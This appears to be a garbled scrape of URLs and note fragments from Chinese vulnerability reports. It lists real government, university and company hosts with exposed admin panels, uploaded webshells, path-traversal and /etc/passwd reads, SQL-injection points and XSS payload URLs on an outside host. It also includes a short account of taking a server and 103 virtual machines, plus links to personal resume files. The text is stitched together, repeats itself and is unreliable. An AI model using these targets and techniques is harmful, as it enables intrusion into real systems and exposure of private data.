http://bbs.mhzx2.wanmei.com http://bbs.sgcq.wanmei.com http://bbs.sgsj.wanmei.com http://bbs.sw.wanmei.com http://bbs.ts.wanmei.com http://bbs.radio.wanmei.com http://bbs.sdxl.wanmei.com http://bbs.xljz.wanmei.com http://bbs.sd.wanmei.com http://bbs.xlzj.wanmei.com http://bbs.shenmo.wanmei.com http://bbs.xmhzx.wanmei.com http://bbs.w2i.wanmei.com http://bbs.world2.wanmei.com http://bbs.xa.wanmei.com http://bbs.zhuxian.wanmei.com http://bbs.zhuxian2.wanmei.com http://bbs.xiaoao.wanmei.com http://bbs.wulin2.wanmei.com https://www.cmpassport.com/ http://gd.kandian.189.cn/ http://gd.kandian.189.cn/invoker/JMXInvokerServlet http://admin.tsz.gfan.com/login.php?act=logging http://www.worldeyes.net/ http://www.worldeyes.net/ http://www.tebon.com.cn/dbzq/zcgl/data/jhjzData.jsp?code=CE0002 http://cmse.sdkd.net.cn/admin/Login.asp http://cmse.sdkd.net.cn/newsinfo.asp?id=2149 http://ucenter.ehaoyao.com/familyMember/index.html) http://218.28.234.99/ViewsTrain.asp?ID=1246 http://cszm.hnfyxh.cn/ua http://mhz.pw/game/discuz/xss.php?domain=bbs.xiaomi.cn st2:http://huiyi.ecloud.10086.cn:80/MSBD/checkcode/getCheckCode http://huiyi.ecloud.10086.cn:80/manager/html http://bbs.ffo.changyou.com http://bbs.eos.changyou.com http://bbs.swd.changyou.com http://bbs.tl.changyou.com http://mhz.pw/game/discuz/xss.php?domain=bbs.ffo.changyou.com http://mhz.pw/game/discuz/xss.php?domain=bbs.eos.changyou.com http://mhz.pw/game/discuz/xss.php?domain=bbs.swd.changyou.com http://mhz.pw/game/discuz/xss.php?domain=bbs.tl.changyou.com http://cbh.zshr.cn/ http://cbh.zshr.cn/person/searchjobs.php?id=10 http://down.chinaz.com/soft/35103.htm http://www.shop7z.com/demo/showone.asp?l_id=44 http://**.**.**/service/wapindex.php http://地址/cgi-bin/web_cgi?op_req=apply&module=conf_bakdown http://地址/cgi-bin/web_cgi?op_req=apply&module=syslog_management&opt=down&type=system http://gd.servyou.com.cn/yingp.asp?info_kind=009002&ID=38 http://gd.servyou.com.cn:800/GDServyou/HKLY/new.aspx http://210.73.128.41/jsbz/ www.moliwanhui.com后台弱口令admin,admin直接登录后台,OTCMS www.wooyun.org/bugs/wooyun-2014-057589提供方法拿下服务器shell权限,遍历服务器文件,下载mysql数据user.MYD文件,成功破解root密码,利用mysql提权(园长博客有介绍),拿下服务器权限,获取kangle配置文件config.xml,解密md5值,登录kangle,103台虚拟机到手。 http://guoji.zhuna.cn/theme-friend http://guoji.zhuna.cn/special_theme/theme_word_positive_add/ http://www.gdsto.com.cn/ http://www.gdsto.com.cn/admin/ewebeditor/uploadfile/aa.asp http://www.gdsto.com.cn/admin/ewebeditor/uploadfile/111.asp http://www.gdsto.com.cn/admin/ewebeditor/uploadfile/cmd.txt http://www.gdsto.com.cn/admin/fuck.asp http://www.gdsto.com.cn/admin/1.asp http://www.gdsto.com.cn/test.html http://**.**.**/tpolice/login!loginView_ http://www.chemdoc.com.cn/login.aspx?ACT=1 http://kaiyuan.hudong.com/sq/site_authorize.php?siteurl= http://www.haojiankang.com/jmx-console/,该服务器Jboss配置不当,没设密码,导致直接可getshell http://down.chinaz.com/soft/35447.htm http://www.edayshop.com/ inurl:sp.asp?sx= http://freetuan.net/zxzx.asp http://www.shfdj.com/zxzx.asp http://www.tuan150.com/zxzx.asp http://www.jmqxl.com/zxzx.asp http://www.pncsdq.com/zxzx.asp http://o.smpx.com/zxzx.asp http://mall.hnllg.com/zxzx.asp http://cszm.hnfyxh.cn/ua soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/ xmlns:web="http://webservice.blf.jcms soapenv:Header/ soapenv:Body web:wsGetAllInfos soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/ xsi:type="xsd:int xsi:type="xsd:int xsi:type="xsd:int xsi:type="xsd:int xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string web:wsGetAllInfos soapenv:Body soapenv:Envelope www.gs.gov.cn http://xxgk.zjds.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.taixing.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.jining.gov.cn/xxgk/services/WSReceive?wsdl http://www.xxgk.lg.gov.cn/xxgk/services/WSReceive?wsdl http://www.jinhua.gov.cn/xxgk/services/WSReceive?wsdl http://gongkai.sd-n-tax.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.wenzhou.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.jsgs.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.nbjiangbei.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.sdxm.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.changde.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.gygov.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.longwan.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.cqyc.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.gaomi.gov.cn:82/xxgk/services/WSReceive?wsdl http://www.huzhou.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.zaozhuang.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.lucheng.gov.cn/xxgk/services/WSReceive?wsdl http://zfxxgk.weihai.gov.cn/xxgk/services/WSReceive?wsdl http://218.94.123.47/xxgk/services/WSReceive?wsdl http://xxgk.yiyuan.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.zhucheng.gov.cn/xxgk/services/WSReceive?wsdl http://www.nanxun.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.xiaogan.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.zibo.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.lyg.gov.cn/xxgk/services/WSReceive?wsdl http://211.138.126.163/xxgk/services/WSReceive?wsdl http://xxgk.wencheng.gov.cn/xxgk/services/WSReceive?wsdl http://zfxxgk.liaocheng.gov.cn/xxgk/services/WSReceive?wsdl http://www.jsforestry.gov.cn/xxgk/services/WSReceive?wsdl http://60.190.68.201:7001/xxgk/services/WSReceive?wsdl http://xxgk.shizhong.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.gzlps.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.jingning.gov.cn/xxgk/services/WSReceive?wsdl http://blxxgk.bl.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.qingzhou.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.panxian.gov.cn/xxgk/services/WSReceive?wsdl http://www.dongtai.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.shanghe.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.cncn.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.gzwd.gov.cn/xxgk/services/WSReceive?wsdl http://www.hzgjj.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.siyang.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.zjwy.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.tianqiao.gov.cn/xxgk/services/WSReceive?wsdl http://218.2.208.145/xxgk/services/WSReceive?wsdl http://xxgk.jc.gansu.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.wzrc.net/xxgk/services/WSReceive?wsdl http://xxgk.hbjs.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.jiangyan.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.jingjiang.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.changle.gov.cn:82/xxgk/services/WSReceive?wsdl http://xxgk.szzj.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.stats-sd.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.hg.gov.cn/xxgk/services/WSReceive?wsdl http://www.zjdlr.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.yj.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.yqjq.gov.cn/xxgk/services/WSReceive?wsdl http://zfxxgk.heze.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk3.nantong.gov.cn/xxgk/services/WSReceive?wsdl http://www.jsgl.cn/xxgk/services/WSReceive?wsdl http://www.zjch.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.yidu.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.jsmuseum.com/xxgk/services/WSReceive?wsdl http://www.77778.com/xxgk/services/WSReceive?wsdl http://xxgk.pingyin.gov.cn/xxgk/services/WSReceive?wsdl http://www.jshb.net/xxgk/services/WSReceive?wsdl http://zfxxgk.seac.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.tx.gov.cn/xxgk/services/WSReceive?wsdl http://www.dejiang.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.yq.gov.cn/xxgk/services/WSReceive?wsdl http://www.ec.js.edu.cn/xxgk/services/WSReceive?wsdl http://www.njzj.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.zjpy.gov.cn/xxgk/services/WSReceive?wsdl http://www.gaoqing.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.czzl.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.liuzhi.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.sx.gov.cn/xxgk_public/services/WSReceive?wsdl http://xxgk.10.gov.cn/gov/services/WSReceive?wsdl http://xxgk.ycxl.gov.cn/gov/services/WSReceive?wsdl http://xxgk.changyang.gov.cn/gov/services/WSReceive?wsdl http://xxgk.haiyan.gov.cn/gov/services/WSReceive?wsdl http://open.jiashan.gov.cn/gov/services/WSReceive?wsdl http://xxgk.yichang.gov.cn/gov/services/WSReceive?wsdl http://xxgk.dyq.gov.cn/gov/services/WSReceive?wsdl http://xxgk.xingshan.gov.cn/gov/services/WSReceive?wsdl http://xxgk.kuiwen.gov.cn/gov/services/WSReceive?wsdl http://xxgk.hbwf.gov.cn/gov/services/WSReceive?wsdl http://www.wuxing.gov.cn/gov/services/WSReceive?wsdl http://61.159.149.203:9080/gov/services/WSReceive?wsdl http://xxgk.dianjun.gov.cn/gov/services/WSReceive?wsdl http://211.138.126.163:7003/gov/services/WSReceive?wsdl http://xxgk.zrt.gov.cn/gov/services/WSReceive?wsdl http://220.191.221.136/gov/services/WSReceive?wsdl http://119.191.58.141/gov/services/WSReceive?wsdl http://zfxxgk.dongying.gov.cn/gov/services/WSReceive?wsdl http://xxgk.hbdy.gov.cn/gov/services/WSReceive?wsdl http://xxgk.yuanan.gov.cn/gov/services/WSReceive?wsdl http://xxgk.lijin.gov.cn/gov/services/WSReceive?wsdl http://xxgk.sdfda.gov.cn/gov/services/WSReceive?wsdl http://data.earthquake.cn/datashare/datashare_details.jsp?id=XJ.201503152341.0002.C.001 http://mis.xinhuanet.com/sxtv2/index/inc/info/info.asp?tid={9E563755-C612-4ECF-A390-B9574DBFB604 http://bbs.auto.sina.com.cn/forum-717-1.html,随意找个贴子,回复 http://www.lzseyy.com/HNews_Show.asp?classid=37&Articleid=2954 http://www.scgbmotorway.com/manager http://58.17.139.94/xb.txt http://www.333jcw.com/gcdc_title.php?id=7657 http://www.wxcs.cn http://bbs.wenjuan.com/t-5287-1-1.html http://cms.h3c.com/h3ccms/resources/file:/etc/passwd http://218.28.29.35:9001/default.asp http://ehr.cofco.com/file/doc/download/邹为_干部履历表.xls http://ehr.cofco.com/file/doc/download/林焕生_干部履历表.xls http://ehr.cofco.com/file/doc/download/王偲_干部履历表.xls http://www.piaoyou.org/case_web.htm http://www.cqship.com/busAreasshow.aspx?BaseInfoId=67 http://www.cqship.com/fleetshow.aspx?BaseInfoId=48 http://www.cqship.com/partysshow.aspx?NewsId=516 http://self.kdah.cn/ http://www1.ahedu.gov.cn/schinfo/login.aspx http://221.193.242.165 http://mnote.weibo.10086.cn/login.html?version=3.8.0 http://218.25.254.41:8090/ http://221.226.253.14:84/Home/List.aspx?newclass=0&type=1 http://www.tumen.gov.cn/news.asp?id=1272&bigclassname=%D5%FE%B8%AE%BD%A8%C9%E8&smallclassname= http://t.cn/RAvtUDF http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.zuiyouxi.com/cservice/ http://218.94.38.180:8092/posg/userLogin.action http://124.202.133.29/admincp/admin/login http://apixy.zuiyouxi.com:8800/admincp/admin/loginUser/ http://tianeky.com.cn/siteinfoQuery.action http://ecop.hq.10086.cn/login.go http://ecop.hq.10086.cn/login.go http://210.32.158.99/zjuiptp/res/Expert_view.action http://111.13.96.23:7778/ http://www.9555168.com/list.php?cat=24 http://dx.9555168.com/page.php?id=16 http://dx.9555168.com/list.php?cat=23 http://client.beijing.gov.cn http://www.asggzyjy.cn/search.jspx?q=1 http://www.asggzyjy.cn/page/index.jspx?code=CMS_GUID_JSGC http://www.asggzyjy.cn/news/cqjy/one/index.jspx?id=1 http://www.asggzyjy.cn/news/jsgc/one/index.jspx?id=1 http://www.asggzyjy.cn/news/news/one/index.jspx?id=7116 http://www.asggzyjy.cn/news/notice/one/index.jspx?id=3980 http://www.asggzyjy.cn/news/notice/page/index.jspx?code=1 http://www.asggzyjy.cn/news/type/one/index.jspx?base=&counter=98060&id=1 http://www.asggzyjy.cn/news/zfcg/one/index.jspx?id=1 http://www.asggzyjy.cn/news/news/all/index.jspx?code=CMS_INTEGRITY_ZWDT http://www.asggzyjy.cn/username_unique.jspx?username=1 http://www.asggzyjy.cn/enterprisecode_unique.jspx?enterpriseCode=1 http://www.asggzyjy.cn/enterprisename_unique.jspx?enterpriseName=1 soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/ xmlns:rec="http://receive.blf.jcms soapenv:Header/ soapenv:Body rec:wsGetColumn soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/ xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string rec:wsGetColumn soapenv:Body soapenv:Envelope www.gs.gov.cn http://xxgk.zjds.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.taixing.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.jining.gov.cn/xxgk/services/WSReceive?wsdl http://www.xxgk.lg.gov.cn/xxgk/services/WSReceive?wsdl http://www.jinhua.gov.cn/xxgk/services/WSReceive?wsdl http://gongkai.sd-n-tax.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.wenzhou.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.jsgs.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.nbjiangbei.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.sdxm.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.changde.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.gygov.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.longwan.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.cqyc.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.gaomi.gov.cn:82/xxgk/services/WSReceive?wsdl http://www.huzhou.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.zaozhuang.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.lucheng.gov.cn/xxgk/services/WSReceive?wsdl http://zfxxgk.weihai.gov.cn/xxgk/services/WSReceive?wsdl http://218.94.123.47/xxgk/services/WSReceive?wsdl http://xxgk.yiyuan.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.zhucheng.gov.cn/xxgk/services/WSReceive?wsdl http://www.nanxun.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.xiaogan.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.zibo.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.lyg.gov.cn/xxgk/services/WSReceive?wsdl http://211.138.126.163/xxgk/services/WSReceive?wsdl http://xxgk.wencheng.gov.cn/xxgk/services/WSReceive?wsdl http://zfxxgk.liaocheng.gov.cn/xxgk/services/WSReceive?wsdl http://www.jsforestry.gov.cn/xxgk/services/WSReceive?wsdl http://60.190.68.201:7001/xxgk/services/WSReceive?wsdl http://xxgk.shizhong.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.gzlps.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.jingning.gov.cn/xxgk/services/WSReceive?wsdl http://blxxgk.bl.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.qingzhou.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.panxian.gov.cn/xxgk/services/WSReceive?wsdl http://www.dongtai.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.shanghe.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.cncn.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.gzwd.gov.cn/xxgk/services/WSReceive?wsdl http://www.hzgjj.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.siyang.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.zjwy.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.tianqiao.gov.cn/xxgk/services/WSReceive?wsdl http://218.2.208.145/xxgk/services/WSReceive?wsdl http://xxgk.jc.gansu.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.wzrc.net/xxgk/services/WSReceive?wsdl http://xxgk.hbjs.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.jiangyan.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.jingjiang.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.changle.gov.cn:82/xxgk/services/WSReceive?wsdl http://xxgk.szzj.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.stats-sd.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.hg.gov.cn/xxgk/services/WSReceive?wsdl http://www.zjdlr.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.yj.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.yqjq.gov.cn/xxgk/services/WSReceive?wsdl http://zfxxgk.heze.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk3.nantong.gov.cn/xxgk/services/WSReceive?wsdl http://www.jsgl.cn/xxgk/services/WSReceive?wsdl http://www.zjch.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.yidu.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.jsmuseum.com/xxgk/services/WSReceive?wsdl http://www.77778.com/xxgk/services/WSReceive?wsdl http://xxgk.pingyin.gov.cn/xxgk/services/WSReceive?wsdl http://www.jshb.net/xxgk/services/WSReceive?wsdl http://zfxxgk.seac.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.tx.gov.cn/xxgk/services/WSReceive?wsdl http://www.dejiang.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.yq.gov.cn/xxgk/services/WSReceive?wsdl http://www.ec.js.edu.cn/xxgk/services/WSReceive?wsdl http://www.njzj.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.zjpy.gov.cn/xxgk/services/WSReceive?wsdl http://www.gaoqing.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.czzl.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.liuzhi.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.sx.gov.cn/xxgk_public/services/WSReceive?wsdl http://xxgk.10.gov.cn/gov/services/WSReceive?wsdl http://xxgk.ycxl.gov.cn/gov/services/WSReceive?wsdl http://xxgk.changyang.gov.cn/gov/services/WSReceive?wsdl http://xxgk.haiyan.gov.cn/gov/services/WSReceive?wsdl http://open.jiashan.gov.cn/gov/services/WSReceive?wsdl http://xxgk.yichang.gov.cn/gov/services/WSReceive?wsdl http://xxgk.dyq.gov.cn/gov/services/WSReceive?wsdl http://xxgk.xingshan.gov.cn/gov/services/WSReceive?wsdl http://xxgk.kuiwen.gov.cn/gov/services/WSReceive?wsdl http://xxgk.hbwf.gov.cn/gov/services/WSReceive?wsdl http://www.wuxing.gov.cn/gov/services/WSReceive?wsdl http://61.159.149.203:9080/gov/services/WSReceive?wsdl http://xxgk.dianjun.gov.cn/gov/services/WSReceive?wsdl http://211.138.126.163:7003/gov/services/WSReceive?wsdl http://xxgk.zrt.gov.cn/gov/services/WSReceive?wsdl http://220.191.221.136/gov/services/WSReceive?wsdl http://119.191.58.141/gov/services/WSReceive?wsdl http://zfxxgk.dongying.gov.cn/gov/services/WSReceive?wsdl http://xxgk.hbdy.gov.cn/gov/services/WSReceive?wsdl http://xxgk.yuanan.gov.cn/gov/services/WSReceive?wsdl http://xxgk.lijin.gov.cn/gov/services/WSReceive?wsdl http://xxgk.sdfda.gov.cn/gov/services/WSReceive?wsdl http://123.127.211.26/ http://123.127.211.26/ams/view.php?id=10 http://123.127.211.26/ams/view.php?id=10 url:http://www.citcc-1.com.cn/index.asp http://www.citcc-1.com.cn/shownews.asp http://www.citcc-1.com.cn/shownews.asp http://www.citcc-1.com.cn/shownews.asp www.diyigaokao.com http://220.191.180.238/phpmyadmin/index.php存在弱口令 http://61.142.174.200/cwc/KFweb/admin/GenerateRegUser.aspx http://cwc.sxufe.edu.cn/KfWeb/admin/GenerateRegUser.aspx http://www.shcdkf.com/kfweb/admin/GenerateRegUser.aspx http://cwch.ahu.edu.cn/querynetweb/admin/GenerateRegUser.aspx http://221.5.51.228/cjb/admin/GenerateRegUser.aspx http://59.72.128.44/KfWeb/admin/GenerateRegUser.aspx http://www.cqvie.com/xfcxbn/admin/GenerateRegUser.aspx http://cycwc.gzife.edu.cn/kefa/admin/GenerateRegUser.aspx http://210.45.92.21/admin/GenerateRegUser.aspx http://cwcx.jlsu.edu.cn/admin/GenerateRegUser.aspx http://cw.syu.edu.cn:8080/kfweb/admin/GenerateRegUser.aspx http://61.142.174.200/cwc/KFweb/admin/GenerateRegUser.aspx http://cwc.sxufe.edu.cn/KfWeb/admin/mdf_userXssf.aspx http://www.shcdkf.com/kfweb/admin/mdf_userXssf.aspx http://gzcx.tynu.edu.cn/kfweb/admin/mdf_userXssf.aspx http://cwch.ahu.edu.cn/querynetweb/admin/mdf_userXssf.aspx http://221.5.51.228/cjb/admin/mdf_userXssf.aspx http://59.72.128.44/KfWeb/admin/mdf_userXssf.aspx http://www.cqvie.com/xfcxbn/admin/mdf_userXssf.aspx http://cycwc.gzife.edu.cn/kefa/admin/mdf_userXssf.aspx http://210.45.92.21/admin/mdf_userXssf.aspx http://cwcx.jlsu.edu.cn/admin/mdf_userXssf.aspx http://cw.syu.edu.cn:8080/kfweb/admin/mdf_userXssf.aspx http://www.shcdkf.com/kfweb/admin/GenerateRegUser.aspx http://cwcx.jlsu.edu.cn/admin/mdf_userXssf.aspx http://www.lzsmzj.gov.cn/news-info.asp?id=479&cataid=11 http://www.rsws.gov.cn/ http://118.194.34.207/ http://118.194.34.207/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector&type=../ http://118.194.34.207/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector&type=../../ http://118.194.34.207/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector&type=../../../ http://118.194.34.207/pos/posbusiness/train_get_code_tree.jsp?codesetid=1* http://118.194.34.207/pos/posbusiness/train http://118.194.34.207/system/report_orgtree.jsp?unitcode=3&report_type=1* http://118.194.34.207/system/report_orgtree.jsp?unitcode=3&report_type=1* http://jxk.sdkd.net.cn/show.asp?nrID=384 http://jxk.sdkd.net.cn/admin/login.asp http://211.154.151.24/yyoa/index.jsp http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://gprs.tofly.cn/ http://x.co/****** http://www.suyufc.gov.cn/ http://www.suyufc.gov.cn//fckeditor/editor/filemanager/connectors/aspx/connector.aspx http://www.suyufc.gov.cn//fckeditor/editor/filemanager/browser/default/browser.html?Type=&Connector=http://www.suyufc.gov.cn//fckeditor/editor/filemanager/connectors/aspx/connector.aspx http://www.suyufc.gov.cn/UserFiles/file/1.asp/201503192104104563424.jpg http://shop.96877.net/product.do主页。注册个用户。 http://218.78.241.80/anmai/Edis/DiathesisAppraise/grghjl.aspx?stuNo=1 http://www.xwgjzx.com:8888/anmai/Edis/DiathesisAppraise/grghjl.aspx?stuNo=1 http://www.gxbyzx.cn:88/anmai/Edis/DiathesisAppraise/grghjl.aspx?stuNo=1 http://jmzx.xmedu.cn:9999/anmai/Edis/DiathesisAppraise/grghjl.aspx?stuNo=1 http://szxx.pudong-edu.sh.cn/anmai/Edis/DiathesisAppraise/grghjl.aspx?stuNo=1 http://58.56.128.21/sendmessage/ http://58.56.128.21/sendmessage/default3.aspx http://sswz.spb.gov.cn/logout.do http://218.200.190.100:8080/ http://218.200.190.100:8080/ZDXM/Desk.aspx可直接访问登陆后的页面 http://bbs.icpcw.com/ http://bbs.icpcw.com//config/config_global.php.bak http://114.242.111.16:8081/bsweb/login.action jdbc:oracle:thin:@192.168.1.124:1521:orcl jdbc:oracle:thin:@192.168.1.124:1521:orcl jdbc:oracle:thin:@10.200.2.3:1521:casc jdbc:oracle:thin:@10.200.2.3:1521:casc http://114.242.111.16:8081/papernew/admin/login.jsp http://114.242.111.16:8081/lybadmin/user.jsp http://jkfw.cpoc.cn/SysJKFW/dlxx/moddlaction_before_modpwd http://jkfw.cpoc.cn/SysJKFW/dlxx/moddlaction_cxdlxx http://jkfw.cpoc.cn/SysJKFW/dlxx/moddlaction_ispasswd?stuid=xxxxxxx&pwd=xxxxxx bbs.union.zhuna.cn/uc_server/admin.php webshell:http://bbs.union.zhuna.cn//config/config_ucenter.php http://diancms.com/user/other/Report.aspx?url= http://bbs.trzone.cn/gateway.php http://house.sdchina.com/loupan/index.aspx?maidian=&mianji2=&mianji1=&zxcd=&jzlb=&area=&xxly=&sq=&cid=869&sort=&ting=&seachText=&kjgd=&cx=&wylx=&wyyt=&jiage2=&cq=&jiage1=&wei= http://www.gansupost.com/bulletin/goView_BULLETIN.shtml?BULLETIN_ID=49abbeb6ed0126d80b9e http://**.**.** body.innerht.ml/pocs/chrome-xssauditor-bypass-html-import/xss.php www.yzdsb.com.cn about:blank,这个域的XSS没太大意义: mx://res/quick-access/index.htm: mx://res/notification/可以调用maxthon.program,执行任意路径的程序。 mx://res/app/%7B33CA60D6-EADC-4558-9185-2EBE14214AB9%7D/index.htm mx://res/quick-access/index.htm和mx://res/notification/等页面的protocol(mx)、host(res)、port(80)都是相同的,所以他们是同源的,符合浏览器SOP策略,我们直接通过mx://res/quick-access/index.htm就可以调用mx://res/notification/的API。 mx://res/quick-access/index.htm域名下的XSS,我们想将其构造成远程命令执行,需要完成以下几步: javascript:xxx”的首页。 about:blank。 http://www.spc.edu.hk/content.php?id=62&mid=70-103 http://xssec.cc/v64xhF?1426782624 http://120.197.89.215/ https://github.com/pkufranky/showoff-ssh-agent-forward/blob/master/personal-statement/01_summary.md https://github.com/pkufranky/showoff-ssh-agent-forward/blob/master/ssh-agent-guide/ssh-guide/01_security.md http://s.wanda.cn http://s.wanda.cn/mw/mobile/login.html http://s.wanda.cn/UcControl/JqchartSaleMoneyCount.aspx?tabtype=XSE http://s.wanda.cn/Upload/20150320/f4ck-[%E5%94%90%E5%B1%B1%E8%B7%AF%E5%8D%97%E4%B8%87%E8%BE%BE%E5%B9%BF%E5%9C%BA-20153201296241].aspx http://182.148.112.134:8004/xilan.do?id=232784&articlesrs=02 http://comment.17k.com/loadUser.action?callback=userCallback&userId=17476593 http://gjdx.gz163.cn/admin/Login.aspx http://www.leshan-hospital.com.cn/readnews.asp?id=2103 http://59.64.79.18/info.aspx?id=622 http://59.64.79.18/login.aspx http://www.cr23g.com/zyjs.asp?id=170 http://www.piaoyou.org/case_web.htm inurl:/cms/website/04或者inurl:subcollist.jsp http://www.zygs.com/zygs/cms/website/04/template_div/subcollist.jsp?oldcid=3386 http://www.hnrbi.com/kcsjy/cms/website/04/template_div/subcollist.jsp?oldcid=3356 http://www.hhs.com.cn/hnjl/cms/website/04/template_div/subcolists.jsp?oldcid=4750 http://218.29.75.230/hngsdc/cms/website/04/template_div/newSubCollist.jsp?oldcid=4272 http://www.hngsdc.com/hngsdc/cms/website/04/template_div/newSubCollist.jsp?oldcid=4386 http://www.hnrbi.com/kcsjy/cms/website/04/template_div/subcollist.jsp?oldcid=3356 http://www.hnrbi.com/kcsjy/cms/website/04/templ http://sqlmap.org http://www.chinamota.com/showpro.asp?id=358 http://www.wanliyiliao.com/showpro.asp?id=1278 http://www.math-mark.com/showpro.asp?id=83 http://www.xuanlusi.com/ShowPro.asp?id=140 http://www.dongfangwangchao.com/showpro.asp?id=1417 